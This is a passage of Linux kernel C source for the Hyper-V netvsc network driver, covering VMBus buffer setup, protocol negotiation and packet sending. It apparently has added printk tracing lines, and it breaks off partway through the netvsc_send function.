28 | #include <linux/slab.h>
29 | #include <linux/netdevice.h>
30 | #include <linux/if_ether.h>
31 | #include <linux/vmalloc.h>
32 | #include <linux/rtnetlink.h>
33 | #include <linux/prefetch.h>
34 | 
35 | #include <asm/sync_bitops.h>
36 | 
37 | #include "hyperv_net.h"
38 | 
39 | extern bool g_block_rndis_thread;
40 | 
41 | 
42 | static struct hv_device *netvsc_channel_to_device(struct vmbus_channel *channel);
43 | /*
44 |  * Switch the data path from the synthetic interface to the VF
45 |  * interface.
46 | */ 47 | void netvsc_switch_datapath(struct net_device *ndev, bool vf) 48 | { 49 | struct net_device_context *net_device_ctx = netdev_priv(ndev); 50 | struct hv_device *dev = net_device_ctx->device_ctx; 51 | struct netvsc_device *nv_dev = rtnl_dereference(net_device_ctx->nvdev); 52 | struct nvsp_message *init_pkt = &nv_dev->channel_init_pkt; 53 | 54 | memset(init_pkt, 0, sizeof(struct nvsp_message)); 55 | init_pkt->hdr.msg_type = NVSP_MSG4_TYPE_SWITCH_DATA_PATH; 56 | if (vf) 57 | init_pkt->msg.v4_msg.active_dp.active_datapath = 58 | NVSP_DATAPATH_VF; 59 | else 60 | init_pkt->msg.v4_msg.active_dp.active_datapath = 61 | NVSP_DATAPATH_SYNTHETIC; 62 | 63 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG4_TYPE_SWITCH_DATA_PATH\n"); 64 | vmbus_sendpacket(dev->channel, init_pkt, 65 | sizeof(struct nvsp_message), 66 | (unsigned long)init_pkt, 67 | VM_PKT_DATA_INBAND, 0); 68 | } 69 | 70 | static struct netvsc_device *alloc_net_device(void) 71 | { 72 | struct netvsc_device *net_device; 73 | 74 | net_device = kzalloc(sizeof(struct netvsc_device), GFP_KERNEL); 75 | if (!net_device) 76 | return NULL; 77 | 78 | init_waitqueue_head(&net_device->wait_drain); 79 | net_device->destroy = false; 80 | atomic_set(&net_device->open_cnt, 0); 81 | net_device->max_pkt = RNDIS_MAX_PKT_DEFAULT; 82 | net_device->pkt_align = RNDIS_PKT_ALIGN_DEFAULT; 83 | 84 | init_completion(&net_device->channel_init_wait); 85 | init_waitqueue_head(&net_device->subchan_open); 86 | INIT_WORK(&net_device->subchan_work, rndis_set_subchannel); 87 | 88 | return net_device; 89 | } 90 | 91 | static void free_netvsc_device(struct rcu_head *head) 92 | { 93 | struct netvsc_device *nvdev 94 | = container_of(head, struct netvsc_device, rcu); 95 | int i; 96 | 97 | for (i = 0; i < VRSS_CHANNEL_MAX; i++) 98 | vfree(nvdev->chan_table[i].mrc.slots); 99 | 100 | kfree(nvdev); 101 | } 102 | 103 | static void free_netvsc_device_rcu(struct netvsc_device *nvdev) 104 | { 105 | call_rcu(&nvdev->rcu, free_netvsc_device); 106 | } 107 | 108 | static void netvsc_destroy_buf(struct hv_device *device) 109 | { 110 | struct nvsp_message *revoke_packet; 111 | struct net_device *ndev = hv_get_drvdata(device); 112 | struct net_device_context *ndc = netdev_priv(ndev); 113 | struct netvsc_device *net_device = rtnl_dereference(ndc->nvdev); 114 | int ret; 115 | 116 | /* 117 | * If we got a section count, it means we received a 118 | * SendReceiveBufferComplete msg (ie sent 119 | * NvspMessage1TypeSendReceiveBuffer msg) therefore, we need 120 | * to send a revoke msg here 121 | */ 122 | if (net_device->recv_section_cnt) { 123 | /* Send the revoke receive buffer */ 124 | revoke_packet = &net_device->revoke_packet; 125 | memset(revoke_packet, 0, sizeof(struct nvsp_message)); 126 | 127 | revoke_packet->hdr.msg_type = 128 | NVSP_MSG1_TYPE_REVOKE_RECV_BUF; 129 | revoke_packet->msg.v1_msg. 130 | revoke_recv_buf.id = NETVSC_RECEIVE_BUFFER_ID; 131 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_REVOKE_RECV_BUF\n"); 132 | ret = vmbus_sendpacket(device->channel, 133 | revoke_packet, 134 | sizeof(struct nvsp_message), 135 | (unsigned long)revoke_packet, 136 | VM_PKT_DATA_INBAND, 0); 137 | /* If the failure is because the channel is rescinded; 138 | * ignore the failure since we cannot send on a rescinded 139 | * channel. This would allow us to properly cleanup 140 | * even when the channel is rescinded. 
141 | */ 142 | if (device->channel->rescind) 143 | ret = 0; 144 | /* 145 | * If we failed here, we might as well return and 146 | * have a leak rather than continue and a bugchk 147 | */ 148 | if (ret != 0) { 149 | netdev_err(ndev, "unable to send " 150 | "revoke receive buffer to netvsp\n"); 151 | return; 152 | } 153 | net_device->recv_section_cnt = 0; 154 | } 155 | 156 | /* Teardown the gpadl on the vsp end */ 157 | if (net_device->recv_buf_gpadl_handle) { 158 | ret = vmbus_teardown_gpadl(device->channel, 159 | net_device->recv_buf_gpadl_handle); 160 | 161 | /* If we failed here, we might as well return and have a leak 162 | * rather than continue and a bugchk 163 | */ 164 | if (ret != 0) { 165 | netdev_err(ndev, 166 | "unable to teardown receive buffer's gpadl\n"); 167 | return; 168 | } 169 | net_device->recv_buf_gpadl_handle = 0; 170 | } 171 | 172 | if (net_device->recv_buf) { 173 | /* Free up the receive buffer */ 174 | vfree(net_device->recv_buf); 175 | net_device->recv_buf = NULL; 176 | } 177 | 178 | /* Deal with the send buffer we may have setup. 179 | * If we got a send section size, it means we received a 180 | * NVSP_MSG1_TYPE_SEND_SEND_BUF_COMPLETE msg (ie sent 181 | * NVSP_MSG1_TYPE_SEND_SEND_BUF msg) therefore, we need 182 | * to send a revoke msg here 183 | */ 184 | if (net_device->send_section_cnt) { 185 | /* Send the revoke receive buffer */ 186 | revoke_packet = &net_device->revoke_packet; 187 | memset(revoke_packet, 0, sizeof(struct nvsp_message)); 188 | 189 | revoke_packet->hdr.msg_type = 190 | NVSP_MSG1_TYPE_REVOKE_SEND_BUF; 191 | revoke_packet->msg.v1_msg.revoke_send_buf.id = 192 | NETVSC_SEND_BUFFER_ID; 193 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_REVOKE_SEND_BUF\n"); 194 | ret = vmbus_sendpacket(device->channel, 195 | revoke_packet, 196 | sizeof(struct nvsp_message), 197 | (unsigned long)revoke_packet, 198 | VM_PKT_DATA_INBAND, 0); 199 | 200 | /* If the failure is because the channel is rescinded; 201 | * ignore the failure since we cannot send on a rescinded 202 | * channel. This would allow us to properly cleanup 203 | * even when the channel is rescinded. 
204 | */ 205 | if (device->channel->rescind) 206 | ret = 0; 207 | 208 | /* If we failed here, we might as well return and 209 | * have a leak rather than continue and a bugchk 210 | */ 211 | if (ret != 0) { 212 | netdev_err(ndev, "unable to send " 213 | "revoke send buffer to netvsp\n"); 214 | return; 215 | } 216 | net_device->send_section_cnt = 0; 217 | } 218 | /* Teardown the gpadl on the vsp end */ 219 | if (net_device->send_buf_gpadl_handle) { 220 | ret = vmbus_teardown_gpadl(device->channel, 221 | net_device->send_buf_gpadl_handle); 222 | 223 | /* If we failed here, we might as well return and have a leak 224 | * rather than continue and a bugchk 225 | */ 226 | if (ret != 0) { 227 | netdev_err(ndev, 228 | "unable to teardown send buffer's gpadl\n"); 229 | return; 230 | } 231 | net_device->send_buf_gpadl_handle = 0; 232 | } 233 | if (net_device->send_buf) { 234 | /* Free up the send buffer */ 235 | vfree(net_device->send_buf); 236 | net_device->send_buf = NULL; 237 | } 238 | kfree(net_device->send_section_map); 239 | } 240 | 241 | int netvsc_alloc_recv_comp_ring(struct netvsc_device *net_device, u32 q_idx) 242 | { 243 | struct netvsc_channel *nvchan = &net_device->chan_table[q_idx]; 244 | int node = cpu_to_node(nvchan->channel->target_cpu); 245 | size_t size; 246 | 247 | size = net_device->recv_completion_cnt * sizeof(struct recv_comp_data); 248 | nvchan->mrc.slots = vzalloc_node(size, node); 249 | if (!nvchan->mrc.slots) 250 | nvchan->mrc.slots = vzalloc(size); 251 | 252 | return nvchan->mrc.slots ? 0 : -ENOMEM; 253 | } 254 | 255 | static int netvsc_init_buf(struct hv_device *device, 256 | struct netvsc_device *net_device, 257 | const struct netvsc_device_info *device_info) 258 | { 259 | struct nvsp_1_message_send_receive_buffer_complete *resp; 260 | struct net_device *ndev = hv_get_drvdata(device); 261 | struct nvsp_message *init_packet; 262 | unsigned int buf_size; 263 | size_t map_words; 264 | int ret = 0; 265 | 266 | /* Get receive buffer area. */ 267 | buf_size = device_info->recv_sections * device_info->recv_section_size; 268 | buf_size = roundup(buf_size, PAGE_SIZE); 269 | 270 | net_device->recv_buf = vzalloc(buf_size); 271 | printk("[*]hv_netvsc:receive buffer page count:%d\n", (buf_size / PAGE_SIZE)); 272 | if (!net_device->recv_buf) { 273 | netdev_err(ndev, 274 | "unable to allocate receive buffer of size %u\n", 275 | buf_size); 276 | ret = -ENOMEM; 277 | goto cleanup; 278 | } 279 | 280 | /* 281 | * Establish the gpadl handle for this buffer on this 282 | * channel. Note: This call uses the vmbus connection rather 283 | * than the channel to establish the gpadl handle. 284 | */ 285 | ret = vmbus_establish_gpadl(device->channel, net_device->recv_buf, 286 | buf_size, 287 | &net_device->recv_buf_gpadl_handle); 288 | if (ret != 0) { 289 | netdev_err(ndev, 290 | "unable to establish receive buffer's gpadl\n"); 291 | goto cleanup; 292 | } 293 | 294 | /* Notify the NetVsp of the gpadl handle */ 295 | init_packet = &net_device->channel_init_pkt; 296 | memset(init_packet, 0, sizeof(struct nvsp_message)); 297 | init_packet->hdr.msg_type = NVSP_MSG1_TYPE_SEND_RECV_BUF; 298 | init_packet->msg.v1_msg.send_recv_buf. 299 | gpadl_handle = net_device->recv_buf_gpadl_handle; 300 | init_packet->msg.v1_msg. 
301 | send_recv_buf.id = NETVSC_RECEIVE_BUFFER_ID; 302 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_SEND_RECV_BUF\n"); 303 | /* Send the gpadl notification request */ 304 | ret = vmbus_sendpacket(device->channel, init_packet, 305 | sizeof(struct nvsp_message), 306 | (unsigned long)init_packet, 307 | VM_PKT_DATA_INBAND, 308 | VMBUS_DATA_PACKET_FLAG_COMPLETION_REQUESTED); 309 | if (ret != 0) { 310 | netdev_err(ndev, 311 | "unable to send receive buffer's gpadl to netvsp\n"); 312 | goto cleanup; 313 | } 314 | 315 | wait_for_completion(&net_device->channel_init_wait); 316 | 317 | /* Check the response */ 318 | resp = &init_packet->msg.v1_msg.send_recv_buf_complete; 319 | if (resp->status != NVSP_STAT_SUCCESS) { 320 | netdev_err(ndev, 321 | "Unable to complete receive buffer initialization with NetVsp - status %d\n", 322 | resp->status); 323 | ret = -EINVAL; 324 | goto cleanup; 325 | } 326 | 327 | /* Parse the response */ 328 | netdev_dbg(ndev, "Receive sections: %u sub_allocs: size %u count: %u\n", 329 | resp->num_sections, resp->sections[0].sub_alloc_size, 330 | resp->sections[0].num_sub_allocs); 331 | 332 | /* There should only be one section for the entire receive buffer */ 333 | if (resp->num_sections != 1 || resp->sections[0].offset != 0) { 334 | ret = -EINVAL; 335 | goto cleanup; 336 | } 337 | 338 | net_device->recv_section_size = resp->sections[0].sub_alloc_size; 339 | net_device->recv_section_cnt = resp->sections[0].num_sub_allocs; 340 | 341 | /* Setup receive completion ring */ 342 | net_device->recv_completion_cnt 343 | = round_up(net_device->recv_section_cnt + 1, 344 | PAGE_SIZE / sizeof(u64)); 345 | ret = netvsc_alloc_recv_comp_ring(net_device, 0); 346 | if (ret) 347 | goto cleanup; 348 | 349 | /* Now setup the send buffer. */ 350 | buf_size = device_info->send_sections * device_info->send_section_size; 351 | buf_size = round_up(buf_size, PAGE_SIZE); 352 | 353 | net_device->send_buf = vzalloc(buf_size); 354 | if (!net_device->send_buf) { 355 | netdev_err(ndev, "unable to allocate send buffer of size %u\n", 356 | buf_size); 357 | ret = -ENOMEM; 358 | goto cleanup; 359 | } 360 | 361 | /* Establish the gpadl handle for this buffer on this 362 | * channel. Note: This call uses the vmbus connection rather 363 | * than the channel to establish the gpadl handle. 
364 | */ 365 | ret = vmbus_establish_gpadl(device->channel, net_device->send_buf, 366 | buf_size, 367 | &net_device->send_buf_gpadl_handle); 368 | if (ret != 0) { 369 | netdev_err(ndev, 370 | "unable to establish send buffer's gpadl\n"); 371 | goto cleanup; 372 | } 373 | 374 | /* Notify the NetVsp of the gpadl handle */ 375 | init_packet = &net_device->channel_init_pkt; 376 | memset(init_packet, 0, sizeof(struct nvsp_message)); 377 | init_packet->hdr.msg_type = NVSP_MSG1_TYPE_SEND_SEND_BUF; 378 | init_packet->msg.v1_msg.send_send_buf.gpadl_handle = 379 | net_device->send_buf_gpadl_handle; 380 | init_packet->msg.v1_msg.send_send_buf.id = NETVSC_SEND_BUFFER_ID; 381 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_SEND_SEND_BUF\n"); 382 | /* Send the gpadl notification request */ 383 | ret = vmbus_sendpacket(device->channel, init_packet, 384 | sizeof(struct nvsp_message), 385 | (unsigned long)init_packet, 386 | VM_PKT_DATA_INBAND, 387 | VMBUS_DATA_PACKET_FLAG_COMPLETION_REQUESTED); 388 | if (ret != 0) { 389 | netdev_err(ndev, 390 | "unable to send send buffer's gpadl to netvsp\n"); 391 | goto cleanup; 392 | } 393 | 394 | wait_for_completion(&net_device->channel_init_wait); 395 | 396 | /* Check the response */ 397 | if (init_packet->msg.v1_msg. 398 | send_send_buf_complete.status != NVSP_STAT_SUCCESS) { 399 | netdev_err(ndev, "Unable to complete send buffer " 400 | "initialization with NetVsp - status %d\n", 401 | init_packet->msg.v1_msg. 402 | send_send_buf_complete.status); 403 | ret = -EINVAL; 404 | goto cleanup; 405 | } 406 | 407 | /* Parse the response */ 408 | net_device->send_section_size = init_packet->msg. 409 | v1_msg.send_send_buf_complete.section_size; 410 | 411 | /* Section count is simply the size divided by the section size. */ 412 | net_device->send_section_cnt = buf_size / net_device->send_section_size; 413 | 414 | netdev_dbg(ndev, "Send section size: %d, Section count:%d\n", 415 | net_device->send_section_size, net_device->send_section_cnt); 416 | 417 | /* Setup state for managing the send buffer. 
*/ 418 | map_words = DIV_ROUND_UP(net_device->send_section_cnt, BITS_PER_LONG); 419 | 420 | net_device->send_section_map = kcalloc(map_words, sizeof(ulong), GFP_KERNEL); 421 | if (net_device->send_section_map == NULL) { 422 | ret = -ENOMEM; 423 | goto cleanup; 424 | } 425 | 426 | goto exit; 427 | 428 | cleanup: 429 | netvsc_destroy_buf(device); 430 | 431 | exit: 432 | return ret; 433 | } 434 | 435 | /* Negotiate NVSP protocol version */ 436 | static int negotiate_nvsp_ver(struct hv_device *device, 437 | struct netvsc_device *net_device, 438 | struct nvsp_message *init_packet, 439 | u32 nvsp_ver) 440 | { 441 | struct net_device *ndev = hv_get_drvdata(device); 442 | int ret; 443 | 444 | memset(init_packet, 0, sizeof(struct nvsp_message)); 445 | init_packet->hdr.msg_type = NVSP_MSG_TYPE_INIT; 446 | init_packet->msg.init_msg.init.min_protocol_ver = nvsp_ver; 447 | init_packet->msg.init_msg.init.max_protocol_ver = nvsp_ver; 448 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG_TYPE_INIT\n"); 449 | /* Send the init request */ 450 | ret = vmbus_sendpacket(device->channel, init_packet, 451 | sizeof(struct nvsp_message), 452 | (unsigned long)init_packet, 453 | VM_PKT_DATA_INBAND, 454 | VMBUS_DATA_PACKET_FLAG_COMPLETION_REQUESTED); 455 | 456 | if (ret != 0) 457 | return ret; 458 | 459 | wait_for_completion(&net_device->channel_init_wait); 460 | 461 | if (init_packet->msg.init_msg.init_complete.status != 462 | NVSP_STAT_SUCCESS) 463 | return -EINVAL; 464 | 465 | if (nvsp_ver == NVSP_PROTOCOL_VERSION_1) 466 | return 0; 467 | 468 | /* NVSPv2 or later: Send NDIS config */ 469 | memset(init_packet, 0, sizeof(struct nvsp_message)); 470 | init_packet->hdr.msg_type = NVSP_MSG2_TYPE_SEND_NDIS_CONFIG; 471 | init_packet->msg.v2_msg.send_ndis_config.mtu = ndev->mtu + ETH_HLEN; 472 | init_packet->msg.v2_msg.send_ndis_config.capability.ieee8021q = 1; 473 | 474 | if (nvsp_ver >= NVSP_PROTOCOL_VERSION_5) { 475 | init_packet->msg.v2_msg.send_ndis_config.capability.sriov = 1; 476 | 477 | /* Teaming bit is needed to receive link speed updates */ 478 | init_packet->msg.v2_msg.send_ndis_config.capability.teaming = 1; 479 | } 480 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG2_TYPE_SEND_NDIS_CONFIG\n"); 481 | ret = vmbus_sendpacket(device->channel, init_packet, 482 | sizeof(struct nvsp_message), 483 | (unsigned long)init_packet, 484 | VM_PKT_DATA_INBAND, 0); 485 | 486 | return ret; 487 | } 488 | 489 | static int netvsc_connect_vsp(struct hv_device *device, 490 | struct netvsc_device *net_device, 491 | const struct netvsc_device_info *device_info) 492 | { 493 | const u32 ver_list[] = { 494 | NVSP_PROTOCOL_VERSION_1, NVSP_PROTOCOL_VERSION_2, 495 | NVSP_PROTOCOL_VERSION_4, NVSP_PROTOCOL_VERSION_5 496 | }; 497 | struct nvsp_message *init_packet; 498 | int ndis_version, i, ret; 499 | 500 | init_packet = &net_device->channel_init_pkt; 501 | 502 | /* Negotiate the latest NVSP protocol supported */ 503 | for (i = ARRAY_SIZE(ver_list) - 1; i >= 0; i--) 504 | if (negotiate_nvsp_ver(device, net_device, init_packet, 505 | ver_list[i]) == 0) { 506 | net_device->nvsp_version = ver_list[i]; 507 | break; 508 | } 509 | 510 | if (i < 0) { 511 | ret = -EPROTO; 512 | goto cleanup; 513 | } 514 | 515 | pr_debug("Negotiated NVSP version:%x\n", net_device->nvsp_version); 516 | 517 | /* Send the ndis version */ 518 | memset(init_packet, 0, sizeof(struct nvsp_message)); 519 | 520 | if (net_device->nvsp_version <= NVSP_PROTOCOL_VERSION_4) 521 | ndis_version = 0x00060001; 522 | else 523 | ndis_version = 0x0006001e; 524 | 525 | 
init_packet->hdr.msg_type = NVSP_MSG1_TYPE_SEND_NDIS_VER; 526 | init_packet->msg.v1_msg. 527 | send_ndis_ver.ndis_major_ver = 528 | (ndis_version & 0xFFFF0000) >> 16; 529 | init_packet->msg.v1_msg. 530 | send_ndis_ver.ndis_minor_ver = 531 | ndis_version & 0xFFFF; 532 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_SEND_NDIS_VER\n"); 533 | /* Send the init request */ 534 | ret = vmbus_sendpacket(device->channel, init_packet, 535 | sizeof(struct nvsp_message), 536 | (unsigned long)init_packet, 537 | VM_PKT_DATA_INBAND, 0); 538 | if (ret != 0) 539 | goto cleanup; 540 | 541 | 542 | ret = netvsc_init_buf(device, net_device, device_info); 543 | 544 | cleanup: 545 | return ret; 546 | } 547 | 548 | static void netvsc_disconnect_vsp(struct hv_device *device) 549 | { 550 | netvsc_destroy_buf(device); 551 | } 552 | 553 | /* 554 | * netvsc_device_remove - Callback when the root bus device is removed 555 | */ 556 | void netvsc_device_remove(struct hv_device *device) 557 | { 558 | struct net_device *ndev = hv_get_drvdata(device); 559 | struct net_device_context *net_device_ctx = netdev_priv(ndev); 560 | struct netvsc_device *net_device 561 | = rtnl_dereference(net_device_ctx->nvdev); 562 | int i; 563 | 564 | cancel_work_sync(&net_device->subchan_work); 565 | 566 | netvsc_disconnect_vsp(device); 567 | 568 | RCU_INIT_POINTER(net_device_ctx->nvdev, NULL); 569 | 570 | /* 571 | * At this point, no one should be accessing net_device 572 | * except in here 573 | */ 574 | netdev_dbg(ndev, "net device safe to remove\n"); 575 | 576 | /* Now, we can close the channel safely */ 577 | vmbus_close(device->channel); 578 | 579 | /* And disassociate NAPI context from device */ 580 | for (i = 0; i < net_device->num_chn; i++) 581 | netif_napi_del(&net_device->chan_table[i].napi); 582 | 583 | /* Release all resources */ 584 | free_netvsc_device_rcu(net_device); 585 | } 586 | 587 | #define RING_AVAIL_PERCENT_HIWATER 20 588 | #define RING_AVAIL_PERCENT_LOWATER 10 589 | 590 | /* 591 | * Get the percentage of available bytes to write in the ring. 592 | * The return value is in range from 0 to 100.
593 | */ 594 | static inline u32 hv_ringbuf_avail_percent( 595 | struct hv_ring_buffer_info *ring_info) 596 | { 597 | u32 avail_read, avail_write; 598 | 599 | hv_get_ringbuffer_availbytes(ring_info, &avail_read, &avail_write); 600 | 601 | return avail_write * 100 / ring_info->ring_datasize; 602 | } 603 | 604 | static inline void netvsc_free_send_slot(struct netvsc_device *net_device, 605 | u32 index) 606 | { 607 | sync_change_bit(index, net_device->send_section_map); 608 | } 609 | 610 | static void netvsc_send_tx_complete(struct netvsc_device *net_device, 611 | struct vmbus_channel *incoming_channel, 612 | struct hv_device *device, 613 | const struct vmpacket_descriptor *desc, 614 | int budget) 615 | { 616 | struct sk_buff *skb = (struct sk_buff *)(unsigned long)desc->trans_id; 617 | struct net_device *ndev = hv_get_drvdata(device); 618 | struct vmbus_channel *channel = device->channel; 619 | u16 q_idx = 0; 620 | int queue_sends; 621 | 622 | /* Notify the layer above us */ 623 | if (likely(skb)) { 624 | const struct hv_netvsc_packet *packet 625 | = (struct hv_netvsc_packet *)skb->cb; 626 | u32 send_index = packet->send_buf_index; 627 | struct netvsc_stats *tx_stats; 628 | 629 | if (send_index != NETVSC_INVALID_INDEX) 630 | netvsc_free_send_slot(net_device, send_index); 631 | q_idx = packet->q_idx; 632 | channel = incoming_channel; 633 | 634 | tx_stats = &net_device->chan_table[q_idx].tx_stats; 635 | 636 | u64_stats_update_begin(&tx_stats->syncp); 637 | tx_stats->packets += packet->total_packets; 638 | tx_stats->bytes += packet->total_bytes; 639 | u64_stats_update_end(&tx_stats->syncp); 640 | 641 | napi_consume_skb(skb, budget); 642 | } 643 | 644 | queue_sends = 645 | atomic_dec_return(&net_device->chan_table[q_idx].queue_sends); 646 | 647 | if (net_device->destroy && queue_sends == 0) 648 | wake_up(&net_device->wait_drain); 649 | 650 | if (netif_tx_queue_stopped(netdev_get_tx_queue(ndev, q_idx)) && 651 | (hv_ringbuf_avail_percent(&channel->outbound) > RING_AVAIL_PERCENT_HIWATER || 652 | queue_sends < 1)) 653 | netif_tx_wake_queue(netdev_get_tx_queue(ndev, q_idx)); 654 | } 655 | 656 | static void netvsc_send_completion(struct netvsc_device *net_device, 657 | struct vmbus_channel *incoming_channel, 658 | struct hv_device *device, 659 | const struct vmpacket_descriptor *desc, 660 | int budget) 661 | { 662 | struct nvsp_message *nvsp_packet = hv_pkt_data(desc); 663 | struct net_device *ndev = hv_get_drvdata(device); 664 | 665 | switch (nvsp_packet->hdr.msg_type) { 666 | case NVSP_MSG_TYPE_INIT_COMPLETE: 667 | case NVSP_MSG1_TYPE_SEND_RECV_BUF_COMPLETE: 668 | case NVSP_MSG1_TYPE_SEND_SEND_BUF_COMPLETE: 669 | case NVSP_MSG5_TYPE_SUBCHANNEL: 670 | /* Copy the response back */ 671 | memcpy(&net_device->channel_init_pkt, nvsp_packet, 672 | sizeof(struct nvsp_message)); 673 | complete(&net_device->channel_init_wait); 674 | break; 675 | 676 | case NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE: 677 | netvsc_send_tx_complete(net_device, incoming_channel, 678 | device, desc, budget); 679 | break; 680 | 681 | default: 682 | netdev_err(ndev, 683 | "Unknown send completion type %d received!!\n", 684 | nvsp_packet->hdr.msg_type); 685 | } 686 | } 687 | 688 | static u32 netvsc_get_next_send_section(struct netvsc_device *net_device) 689 | { 690 | unsigned long *map_addr = net_device->send_section_map; 691 | unsigned int i; 692 | 693 | for_each_clear_bit(i, map_addr, net_device->send_section_cnt) { 694 | if (sync_test_and_set_bit(i, map_addr) == 0) 695 | return i; 696 | } 697 | 698 | return NETVSC_INVALID_INDEX; 699 | 
} 700 | 701 | static u32 netvsc_copy_to_send_buf(struct netvsc_device *net_device, 702 | unsigned int section_index, 703 | u32 pend_size, 704 | struct hv_netvsc_packet *packet, 705 | struct rndis_message *rndis_msg, 706 | struct hv_page_buffer *pb, 707 | struct sk_buff *skb) 708 | { 709 | char *start = net_device->send_buf; 710 | char *dest = start + (section_index * net_device->send_section_size) 711 | + pend_size; 712 | int i; 713 | u32 msg_size = 0; 714 | u32 padding = 0; 715 | u32 remain = packet->total_data_buflen % net_device->pkt_align; 716 | u32 page_count = packet->cp_partial ? packet->rmsg_pgcnt : 717 | packet->page_buf_cnt; 718 | 719 | /* Add padding */ 720 | if (skb->xmit_more && remain && !packet->cp_partial) { 721 | padding = net_device->pkt_align - remain; 722 | rndis_msg->msg_len += padding; 723 | packet->total_data_buflen += padding; 724 | } 725 | 726 | for (i = 0; i < page_count; i++) { 727 | char *src = phys_to_virt(pb[i].pfn << PAGE_SHIFT); 728 | u32 offset = pb[i].offset; 729 | u32 len = pb[i].len; 730 | 731 | memcpy(dest, (src + offset), len); 732 | msg_size += len; 733 | dest += len; 734 | } 735 | 736 | if (padding) { 737 | memset(dest, 0, padding); 738 | msg_size += padding; 739 | } 740 | 741 | return msg_size; 742 | } 743 | 744 | static inline int netvsc_send_pkt( 745 | struct hv_device *device, 746 | struct hv_netvsc_packet *packet, 747 | struct netvsc_device *net_device, 748 | struct hv_page_buffer *pb, 749 | struct sk_buff *skb) 750 | { 751 | struct nvsp_message nvmsg; 752 | struct nvsp_1_message_send_rndis_packet * const rpkt = 753 | &nvmsg.msg.v1_msg.send_rndis_pkt; 754 | struct netvsc_channel * const nvchan = 755 | &net_device->chan_table[packet->q_idx]; 756 | struct vmbus_channel *out_channel = nvchan->channel; 757 | struct net_device *ndev = hv_get_drvdata(device); 758 | struct netdev_queue *txq = netdev_get_tx_queue(ndev, packet->q_idx); 759 | u64 req_id; 760 | int ret; 761 | u32 ring_avail = hv_ringbuf_avail_percent(&out_channel->outbound); 762 | printk("[*]hv_netvsc netvsc_send_pkt channel:%p idx:%d\n", out_channel, packet->q_idx); 763 | nvmsg.hdr.msg_type = NVSP_MSG1_TYPE_SEND_RNDIS_PKT; 764 | if (skb) 765 | rpkt->channel_type = 0; /* 0 is RMC_DATA */ 766 | else 767 | rpkt->channel_type = 1; /* 1 is RMC_CONTROL */ 768 | 769 | rpkt->send_buf_section_index = packet->send_buf_index; 770 | if (packet->send_buf_index == NETVSC_INVALID_INDEX) 771 | rpkt->send_buf_section_size = 0; 772 | else 773 | rpkt->send_buf_section_size = packet->total_data_buflen; 774 | 775 | req_id = (ulong)skb; 776 | 777 | if (out_channel->rescind) 778 | return -ENODEV; 779 | 780 | if (packet->page_buf_cnt) { 781 | if (packet->cp_partial) 782 | pb += packet->rmsg_pgcnt; 783 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_SEND_RNDIS_PKT\n"); 784 | ret = vmbus_sendpacket_pagebuffer(out_channel, 785 | pb, packet->page_buf_cnt, 786 | &nvmsg, sizeof(nvmsg), 787 | req_id); 788 | } else { 789 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG1_TYPE_SEND_RNDIS_PKT\n"); 790 | ret = vmbus_sendpacket(out_channel, 791 | &nvmsg, sizeof(nvmsg), 792 | req_id, VM_PKT_DATA_INBAND, 793 | VMBUS_DATA_PACKET_FLAG_COMPLETION_REQUESTED); 794 | } 795 | 796 | if (ret == 0) { 797 | atomic_inc_return(&nvchan->queue_sends); 798 | 799 | if (ring_avail < RING_AVAIL_PERCENT_LOWATER) 800 | netif_tx_stop_queue(txq); 801 | } else if (ret == -EAGAIN) { 802 | netif_tx_stop_queue(txq); 803 | if (atomic_read(&nvchan->queue_sends) < 1) { 804 | netif_tx_wake_queue(txq); 805 | ret = -ENOSPC; 806 | } 807 | } else
{ 808 | netdev_err(ndev, 809 | "Unable to send packet pages %u len %u, ret %d\n", 810 | packet->page_buf_cnt, packet->total_data_buflen, 811 | ret); 812 | } 813 | 814 | return ret; 815 | } 816 | 817 | /* Move packet out of multi send data (msd), and clear msd */ 818 | static inline void move_pkt_msd(struct hv_netvsc_packet **msd_send, 819 | struct sk_buff **msd_skb, 820 | struct multi_send_data *msdp) 821 | { 822 | *msd_skb = msdp->skb; 823 | *msd_send = msdp->pkt; 824 | msdp->skb = NULL; 825 | msdp->pkt = NULL; 826 | msdp->count = 0; 827 | } 828 | 829 | /* RCU already held by caller */ 830 | int netvsc_send(struct net_device_context *ndev_ctx, 831 | struct hv_netvsc_packet *packet, 832 | struct rndis_message *rndis_msg, 833 | struct hv_page_buffer *pb, 834 | struct sk_buff *skb) 835 | { 836 | struct netvsc_device *net_device 837 | = rcu_dereference_bh(ndev_ctx->nvdev); 838 | struct hv_device *device = ndev_ctx->device_ctx; 839 | int ret = 0; 840 | struct netvsc_channel *nvchan; 841 | u32 pktlen = packet->total_data_buflen, msd_len = 0; 842 | unsigned int section_index = NETVSC_INVALID_INDEX; 843 | struct multi_send_data *msdp; 844 | struct hv_netvsc_packet *msd_send = NULL, *cur_send = NULL; 845 | struct sk_buff *msd_skb = NULL; 846 | bool try_batch; 847 | bool xmit_more = (skb != NULL) ? skb->xmit_more : false; 848 | 849 | /* If device is rescinded, return error and packet will get dropped. */ 850 | if (unlikely(!net_device || net_device->destroy)) 851 | return -ENODEV; 852 | 853 | /* We may race with netvsc_connect_vsp()/netvsc_init_buf() and get 854 | * here before the negotiation with the host is finished and 855 | * send_section_map may not be allocated yet. 856 | */ 857 | if (unlikely(!net_device->send_section_map)) 858 | return -EAGAIN; 859 | 860 | nvchan = &net_device->chan_table[packet->q_idx]; 861 | packet->send_buf_index = NETVSC_INVALID_INDEX; 862 | packet->cp_partial = false; 863 | 864 | /* Send control message directly without accessing msd (Multi-Send 865 | * Data) field which may be changed during data packet processing. 
